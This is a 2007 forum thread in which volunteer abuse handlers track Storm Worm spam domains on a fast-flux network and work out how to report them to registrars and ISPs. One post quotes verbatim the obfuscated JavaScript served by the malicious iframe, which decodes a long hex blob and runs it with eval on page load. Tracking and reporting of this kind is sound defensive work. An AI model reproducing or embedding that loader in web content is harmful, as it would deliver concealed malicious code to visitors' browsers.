| View previous topic :: View next topic |
| Author |
Message |
AlphaCentauri
SIRT Handler Premium Member
 Joined: Nov 20, 2003 Posts: 2668
|
Posted: Mon Dec 24, 2007 4:04 am Post subject: storm worm spam |
|
|
I anyone wants to see what a zero second fast flux looks like, there is new spam arriving for merrychristmasdude[dot]com (DO NOT visit this site; it is seriously evil; reported to MIRT already). If you go to a nslookup site like swhois.net and enter the domain name into the nslookup form, it gives you just one IP address. But if you enter it again, you get a different IP address. You can enter as frequently as you want and you'll rarely get a repeat.
Normally when you get spammed to a malware site, you can report it to the hosting service to get it shut down. But you can't do that with this site, because it's on a new network every second, occupying potentially thousands of IP addresses per day. That's why tembow's botnet reporting is necessary. I'm trying to find what registrar to report it to ("ANO REGIONAL NETWORK INFORMATION CENTER DBA RU", with its whois at nic.ru; nic.ru claims to be ICANN accredited, but I can't find any address for it on its site or the ICANN registrars list. (Maybe RBN, I guess).
Although the spamwiki botnet file for storm worm is down, I'm assuming this is also the storm worm botnet because both storm IP addresses and merrychristmasdude will display the same small image if you look for any gif file (eg, if you find an IP address is 123.123.123.123, then 123.123.123.123/text.gif will display the image). Last week it was stock spam, but now it's a tiny icon of some sort.
|
|
| Back to top |
|
 |
AplusWebMaster
General

 Joined: Mar 14, 2004 Posts: 4622 Location: USA
|
|
| Back to top |
|
 |
AlphaCentauri
SIRT Handler Premium Member
 Joined: Nov 20, 2003 Posts: 2668
|
Posted: Mon Dec 24, 2007 4:26 pm Post subject: |
|
|
I can see that clicking on the pictures downloads stripshow.exe. But does anyone know what the iframe is doing?
|
|
| Back to top |
|
 |
fogram
Trooper
 Premium Member
 Joined: Sep 26, 2007 Posts: 14
|
Posted: Mon Dec 24, 2007 6:29 pm Post subject: |
|
|
| AlphaCentauri wrote: | | I can see that clicking on the pictures downloads stripshow.exe. But does anyone know what the iframe is doing? |
All I am getting at this moment is a redirection to Google:
| Code: |
Connect to 64.231.203.17 on port 80 ... ok
GET /cgi-bin/in.cgi?p=100 HTTP/1.1[CRLF]
Host: 64.231.203.17[CRLF]
Connection: close[CRLF]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
.
.
.
HTTP Status Code: HTTP/1.1 302 Found
Connection: close CRLF
Transfer-Encoding: chunked CRLF
Location: http://www.google.com CRLF
Date: Mon, 24 Dec 2007 17:35:59 GMT CRLF
Server: lighttpd/1.4.18 CRLF
Keep-Alive: Closed CRLF |
That's when connection directly to the IP instead of domain name.
I tried different User Agent strings too (Netscape 4.8, IE 6/7, Opera 9.2 - All Windows)
|
|
| Back to top |
|
 |
AplusWebMaster
General

 Joined: Mar 14, 2004 Posts: 4622 Location: USA
|
|
| Back to top |
|
 |
Karlston
Corporal

 Joined: May 07, 2006 Posts: 51 Location: Australia
|
Posted: Tue Dec 25, 2007 12:34 am Post subject: Re: storm worm spam |
|
|
| AlphaCentauri wrote: | | I'm trying to find what registrar to report it to ("ANO REGIONAL NETWORK INFORMATION CENTER DBA RU", with its whois at nic.ru; nic.ru claims to be ICANN accredited, but I can't find any address for it on its site or the ICANN registrars list. (Maybe RBN, I guess). |
The best I can find is this page...
http://www.nic.ru/about/en/contact_ncc.html
I've fired off some emails to support[at]nic.ru, and (guessing) abuse[at]nic.ru, and to the hosters of the 13 name server IP's, many at !@#$%^& "we take spam very seriously" Comcast. _________________ "In theory, there is no difference between theory and practice. But, in practice, there is." ~ Jan L. A. van de Snepscheut
|
|
| Back to top |
|
 |
fogram
Trooper
 Premium Member
 Joined: Sep 26, 2007 Posts: 14
|
Posted: Tue Dec 25, 2007 2:58 pm Post subject: |
|
|
| fogram wrote: | | AlphaCentauri wrote: | | I can see that clicking on the pictures downloads stripshow.exe. But does anyone know what the iframe is doing? |
All I am getting at this moment is a redirection to Google:
| Code: |
Connect to 64.231.203.17 on port 80 ... ok
GET /cgi-bin/in.cgi?p=100 HTTP/1.1[CRLF]
Host: 64.231.203.17[CRLF]
Connection: close[CRLF]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
.
.
.
HTTP Status Code: HTTP/1.1 302 Found
Connection: close CRLF
Transfer-Encoding: chunked CRLF
Location: http://www.google.com CRLF
Date: Mon, 24 Dec 2007 17:35:59 GMT CRLF
Server: lighttpd/1.4.18 CRLF
Keep-Alive: Closed CRLF |
That's when connection directly to the IP instead of domain name.
I tried different User Agent strings too (Netscape 4.8, IE 6/7, Opera 9.2 - All Windows) |
NOTE:
The iframe source code has now changed to (hard wraps inserted):
| Code: |
<html> <script language="JavaScript"> <!-- function
HT3isce3F(stEe8t6jN){var
oPRp2D137=arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var X3XKFCBMe;var gOx5OEn4w;var rJ7DUvB47=oPRp2D137.length;var
xuV0g0U41;var jurdnGCgK='';var qfn5b1OlG=new
Array();for(gOx5OEn4w=0;gOx5OEn4w<256;gOx5OEn4w++)qfn5b1OlG[gOx5OEn4w]=0
;var X3XKFCBMe=1;for(gOx5OEn4w=128;gOx5OEn4w;gOx5OEn4w>>=1)
{X3XKFCBMe=(X3XKFCBMe>>>1)^((X3XKFCBMe&1)?3988292384:0);for(pw4aO45CU=0;
pw4aO45CU<256;pw4aO45CU+=gOx5OEn4w*2)
{qfn5b1OlG[pw4aO45CU+gOx5OEn4w]=(qfn5b1OlG[pw4aO45CU]^X3XKFCBMe);if
(qfn5b1OlG[pw4aO45CU+gOx5OEn4w] < 0)
{qfn5b1OlG[pw4aO45CU+gOx5OEn4w]+=4294967296;}}}xuV0g0U41=4294967295;for(
X3XKFCBMe=0;X3XKFCBMe<rJ7DUvB47;X3XKFCBMe++){xuV0g0U41=qfn5b1OlG[(
xuV0g0U41^oPRp2D137.charCodeAt(X3XKFCBMe))&255]^((xuV0g0U41>>8)&16777215
);}var I3oB5aLd5=new Array();xuV0g0U41=xuV0g0U41^4294967295;if
(xuV0g0U41<0)
{xuV0g0U41+=4294967296;}xuV0g0U41=xuV0g0U41.toString(16).toUpperCase();
var q571Q6183=new Array();var
rJ7DUvB47=xuV0g0U41.length;for(gOx5OEn4w=0;gOx5OEn4w<8;gOx5OEn4w++) {var
m5fM2HXOL=rJ7DUvB47+gOx5OEn4w;I3oB5aLd5[gOx5OEn4w]=1;if (m5fM2HXOL>=8)
{m5fM2HXOL=m5fM2HXOL-8;q571Q6183[gOx5OEn4w]=xuV0g0U41.charCodeAt(
m5fM2HXOL);} else {q571Q6183[gOx5OEn4w]=48;}}var i7ai4kpg4=0;var
hmNLIb4Qw;var l1Vsa06Bf;var
nELO66un1;rJ7DUvB47=stEe8t6jN.length;nELO66un1=rJ7DUvB47;for(gOx5OEn4w=0
;gOx5OEn4w<rJ7DUvB47;gOx5OEn4w+=2){var
qcG676NTJ=stEe8t6jN.substr(gOx5OEn4w,2);hmNLIb4Qw=parseInt(qcG676NTJ,16)
;l1Vsa06Bf=hmNLIb4Qw-q571Q6183[i7ai4kpg4];if(l1Vsa06Bf<0)
{l1Vsa06Bf=l1Vsa06Bf+256;}jurdnGCgK+=String.fromCharCode(l1Vsa06Bf);
nELO66un1++;if(i7ai4kpg4<q571Q6183.length-1)
{I3oB5aLd5[gOx5OEn4w]=2;i7ai4kpg4++;} else
{i7ai4kpg4=0;}}eval(jurdnGCgK);} //--> </script> <body
onLoad="HT3isce3F('
96bbB0A8ac9bA3B1509CA78b8066989764ba6a95686aa17464AA977761adaaa4a2669178
6Ea26bac6198898299a49BB89DABb0b9ab6097a49Cb2A7aa66a6a396A4b8ABB39f5A5D71
a2ABb2B19995996b5FA299749F5e5B6A5974B6B48Da2a4a8a289A3b89d5a5d7eA6a7B465
af849BB4A4769977836DaaA4a266B09BA77Aa795a37Aba80ae93a6637B7Ebb8D7d686b78
a78391786Ea26bac61988973a497A2aaA4AE7dBB99a4549b7D9EA5986C7DA8B56BBCA3B7
58A997b5767d857ca28b716A5781b8A6aa52A07671B795756a8468809eABB96579a4a6A4
a96E6B809ea1A66B9e9Cb18Dab84A777A8837280A688A38Ba398B579b06E66786681B09b
A77Aa795a37aBA70635ba07671b795756A84689e9E9CB18Dab84a777a8a37F7573A895B5
50BD94acA9a6649A62917F767398A3b558b498B480a586b664be7f766A6a6FB186B58ab8
8Aa568BB6Bb498b480a586B664BE808375635d63ABbd94aca9a6649A62917F6daf849BB4
A476997783707281616fa06D60a986aaa1ba729c6A7D5A745985757E706a667c62797A79
72625D7E96B5b46D9e62989164997893796f647e9676A6936C856a917182747A6e6D9a73
949476986e80756e6db498b480A586B664be6C776152afaf6387B398686486778Bac72A9
866687797E876DB38eA17Cb682b976BD956f5Caf6387B398686486778BAC72a986668779
7E879fA3AF849BB4a4769977835B6fAC96666aB16b73A59660789479939864A77E7a957b
86735FB186B58AB88Aa568BB8D667E65685b54be9C7983b68B62669564a1a8759C806896
66948370A688a38bA398b579B08f5F8064787B7971686B75697c7Dc2b5AF8C9088a99579
83a6A68064787b7971686B75697b7dABA7a45Cba82adb3b96889668E6D767dbc8A99A5b7
609d7490747d6Cbc788b787c6dA96fba82adb3B96889668E5B716Bc0907f8CA6837a8Db9
aa6FA07671B795756a84689E589E8f9D9b85688Ea4B8a0946B68a47a9977948C66959CA4
a289b1a99d73a86Ba798a9B6AC628b757B6f6b6B6A6769a08e6E6a9d858A97966491b6B7
76706C6c5677787c6f696674656f7dc2ae93a6639279858f6864647AA983b0AAAF5275b5
A2A7bb6D616D8c9088A9957983a6a68088939Aa88b667Fb7a2a4767771666d7967787B7a
739b9a63589e8F9D9B85688eA4b87e756152AF9b7d9Ea5986c7da8B55b83767771666d79
67787b7b73AF8c9088a9957983A6A68088939aa88B667fB7A274b6B48bA6A6AC9eAD6A76
6e5B62b79f9BB2b59da477a4A3AB6a6e73a895b550979A7A68679fAD72777fB39Da95484
A2b8a3BE605B6FB991B8629070ab7C88667D77bc758a819b93997690ACa462af95B4A9b9
a06d9Ab2a26eB09ba77aa795A37aba82686Da2999f8EB597ab66ac7f6881B09Ba77aA795
A37aba70635B54beA6A7b46584a87FAF66bf76756F6F7f7bA98E877b6F67ab6e9e9Cb18D
ab84A777A881a4787B7C6475607Dbba0A688A38bA398b579b08F71746bAFA865607EAA8e
9c7CBB7968697280686F62c084A87FAF66BF76756f6f80b97Bb278be6C626b706881939d
6d6269AE9a8873a0A688a38Ba398B579b08f719b7D9ea5986C7Da8b55Ea9aaA6AA75a3a7
9587b66D84a87faf66bf76756f5b6FC050abaeb89D52af94887b727aA39C76748bB498B4
80A586b664be9f826C6A6FC0ADBCA3b758826aA8627C8A756A7b71736BBCa3b758a58999
9e94757D7c9a6Fb991b86291688A65a67bb0A5AC73A895B55096B387797d6673617C7D90
70ab7c88667d77bc7582647b9d7776a98D6462af95B4a9b9A06d84B472878D7768636A80
7B7EBB8D7D686B78A781a8b4aa5aa2999F8eB597AB66AC806081B09bA77aA795A37aba81
836Aad8b757C797aAF6DA2999F8Eb597ab66AC6E6d786Bc0ae93A663A58F738B8c9c827A
A3839275709F6577949b7473aba796B6a4B86Ab38Ea17Cb682b976BD64645d7EA39b98b3
86656C879883B2a6aaa5998c9Eba6aBA81637A979A9479b864636A6c6B92729d69957Fad
93ad7Fb88d88a291637e86AD65838C78607BadAF7a638F9366ab747B8062668c8d81abAB
607e649b61a98dAF9b9970735966BD91688A65A67Bb0A5ac757E649B61A98dAF9B995f75
657c7DC2AF95a689678979af915D7196A4B8abB39f609ab59Fb385AD99A477b294ab6a91
688a65a67Bb0a5ac616d84b472878d7768636A6e5B81ABab60826Aa8627C8a756A7b7094
887B727aA39c76745eB2a7B39Fa69C70616f62C09a65778d6078727cb18Da2999f8Eb597
AB66ACa06d787D956E9766797876748e635D6fc050ABaeb89D52AF9366AB747B8062668c
6d767dC2b597aaa49C6eb9a8AA786b8667b09B6E73af3e99958c8A799c8668b7586D7678
6C7567a8727d7b777a696a74927B7B7e9a666d889277a37a6E676B8866787BA67A636D7B
727C7baa79737589727c78797967957a917C7b777a6B7579687da37779697575717C7BAB
9a6b6a7c667aA37e9967757A91a783769a6B6a7666a879766c986789648B75876C779677
717BA37D79747578727b77AB9a6a7579927c797C9a68757c92797BA699697679927C7b87
6e93697a91aa7B779a65957b727D7B7c996b6d84667977896E676A7668897b7C7a6a6D79
697a7b797a6995A4727883866E6669A8678975aa6C786884727b7B7E9a666D887277A37a
6F659677717Da3a67065957c727B837879779576727Da3a6996969a76679a3799A697577
667a78776e64697A6876a37a70646B79678878A76F646A7a677978766f736b7c667eA37d
6f986a7a677e78a66f696b77677978a86F6B6aa567A7777c99966b88677f78866f946a7c
677A787c6f966b74677877889a626B756778787E6f676ba4677C78896F736a7a677d7876
6e94957a718B7B7C996B6D7791a777786e976Ba664AC76756c7867a964a77b7a7A667577
727d837899699576927b778b99699673917cA3AB6F626D7972778376999395A9917C797E
79736da8718a7B7a6e967677917bA37D79749578927B77a67062688864A9696E73')">
</body> </html>
|
That's when using IE6 as User-Agent string.
|
|
| Back to top |
|
 |
ahoier
SIRT Handler
 Joined: Jan 14, 2006 Posts: 1024 Location: USA
|
Posted: Tue Dec 25, 2007 11:37 pm Post subject: |
|
|
Kinda strange...I've seen a bunch of these and SpamCop will not report the IPs...I've seen comcast IPs and Charter IPs as I kept refreshing my report page, but all of them stated ISP refuses reports or whatever crap...
So whatever...I sent out some manual reports to the abuse addresses for some of the IPs that SpamCop returned.
|
|
| Back to top |
|
 |
AlphaCentauri
SIRT Handler Premium Member
 Joined: Nov 20, 2003 Posts: 2668
|
Posted: Wed Dec 26, 2007 2:09 am Post subject: |
|
|
There is little point reporting the site hosting merrychristmasdude[dot]com through spamcop. Fast flux means when the folks on the help desk get the spamcop report and check that URL, they'll find it is hosted on someone else's network. It is totally random which IP it will be at when spamcop parses it or when the help desk researches it. You not only need to tell the ISP the IP address, you need the date and time it was observed there, and you have to make sure the help desk person is familiar with fast flux so they know not to expect to see it at the same IP address when they check. So for these, while I do leave the box checked for spamcop reporting, I write a note in comments to let them know what's going on.
|
|
| Back to top |
|
 |
ahoier
SIRT Handler
 Joined: Jan 14, 2006 Posts: 1024 Location: USA
|
Posted: Wed Dec 26, 2007 4:55 am Post subject: |
|
|
Yea, I leave a note too regarding these sort of sites when I see them, with links to this thread too (since it points out the 0-delay effect this one has- and only displays one IP at a time/per refresh).
|
|
| Back to top |
|
 |
pwillener
SRT Trainee
 Premium Member
 Joined: Apr 17, 2006 Posts: 1721 Location: Japan
|
Posted: Wed Dec 26, 2007 9:15 am Post subject: |
|
|
Another one I received today is 'uhavepostcard.com' (reported to MIRT), offering a download of 'happy-2008.exe'. Same registrar; reports bounce with "Delivery Status Notification (Delay)". Meaning, so far nobody has been notified.
Same principle; different IP address every time it's checked.
|
|
| Back to top |
|
 |
Huldin-the-Goth
Sergeant

 Joined: Jan 08, 2005 Posts: 78 Location: Uk
|
|
| Back to top |
|
 |
tembow
Blue Angel Premium Member
 Joined: Oct 10, 2005 Posts: 2883
|
Posted: Wed Dec 26, 2007 11:03 am Post subject: |
|
|
The IPs for Storm are being reported to all of the ISPs several times per week. See the Botnet Tracker thread.
|
|
| Back to top |
|
 |
AplusWebMaster
General

 Joined: Mar 14, 2004 Posts: 4622 Location: USA
|
Posted: Wed Dec 26, 2007 11:57 am Post subject: |
|
|
More updates:
- http://isc.sans.org/diary.html?storyid=3784
Last Updated: 2007-12-25 19:36:34 UTC ...(Version: 3) -"...As with 'merry christmas dude.com', this domain appears to be registered through nic.ru. It also appears to be hosted on the same fast-flux network, now with at least 8000 nodes. If you go to that web site, currently the malware file is 'happy2008.exe'. We will add more analysis details throughout the day as we get them..."
New Years Storm deja vu
- http://holisticinfosec.blogspot.com/2007/12/new-years-storm-deja-vu.html
December 25, 2007 - "...it copies itself to C:\WINDOWS as disnisa.exe... better AV coverage now that this variant's been around for a few days..."
. _________________ AplusWebMaster
~ Are you up to date or vulnerable to Hackers? ...or both?
.
|
|
| Back to top |
|
 |
pwillener
SRT Trainee
 Premium Member
 Joined: Apr 17, 2006 Posts: 1721 Location: Japan
|
Posted: Thu Dec 27, 2007 4:36 am Post subject: |
|
|
All nic.ru email addresses bounce. Has anyone tried to send them a complaint via fax? (http://www.nic.ru/about/en/)
|
|
| Back to top |
|
 |
|
|